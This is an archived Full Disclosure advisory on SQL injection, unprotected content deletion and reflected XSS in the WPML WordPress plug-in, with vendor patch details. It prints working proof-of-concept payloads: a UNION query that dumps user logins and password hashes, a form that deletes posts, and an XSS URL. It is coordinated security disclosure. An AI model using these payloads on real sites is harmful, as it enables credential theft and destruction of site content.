lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAOm4KJUGAA7ydAr2AjCbkzea_n_wqc=iM1f651sVtXbLC56pVQ@mail.gmail.com>
Date: Thu, 12 Mar 2015 20:38:31 +0200
From: Jouko Pynnonen <jouko@....fi>
To: fulldisclosure@...lists.org
Subject: [FD] WPML WordPress plug-in SQL injection etc.

*OVERVIEW*

WPML is the industry standard for creating multi-lingual WordPress sites.
Three vulnerabilities were found in the plug-in. The most serious of them,
an SQL injection problem, allows anyone to read the contents of the
WordPress database, including user details and password hashes, without
authentication.

System administrators should update to version 3.1.9.1 released earlier
this week to resolve the issues.



*DETAILS*

*1. SQL injection*
When WPML processed a HTTP POST request containing the parameter
”action=wp-link-ajax”, the current language is determined by parsing the
HTTP referer. The parsed language code is not checked for validity, nor
SQL-escaped. The user doesn’t need to be logged in.

By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary tables
and retrieve their results. In addition to the standard WordPress database
and tables, the attacker may query all other databases and tables
accessible to the web backend.

The following HTML snippet demonstrates the vulnerability:

<script>var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";if (document.location.search.length < 2)
        document.location.search="lang=xx' UNION "+union+" -- -- ";</script>
<form method=POST
action="https://YOUR.WORDPRESS.BLOG/comments/feed"><input type=hidden
name=action value="wp-link-ajax"><input type=submit></form>

The results of the SQL query will be shown in the comments feed
XML-formatted.


*2. Page/post/menu deletion*

WPML contains a ”menu sync” function which helps site administrators to
keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.
Example:

<form method=POST
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"><input
type=hidden name="action" value="icl_msync_confirm"><input type=text
name="sync" size=50 value="del[x][y][12345]=z"><input
type=submit></form>

Submitting the above form would delete the row with the ID 12345 in the
wp_posts database. Several items be deleted with the same request.



*3. Reflected XSS*

The ”reminder popup” code intended for administrators in WPML didn’t check
for login status or nonce. An attacker can direct target users to an URL
like:

https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f


to execute JavaScript in their browser. This example bypasses the Chrome
XSS Auditor.
In the case of WordPress, XSS triggered by an administrator can lead to
server-side compromise via the plugin and theme editors.



*CREDITS*

The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.

The vendor was notified on March 02, 2015 and the patch was released on
March 10.

Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/

An up-to-date version of this document can be found on our website
http://klikki.fi .


-- 
Jouko Pynnönen <jouko@....fi>
Klikki Oy - http://klikki.fi

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ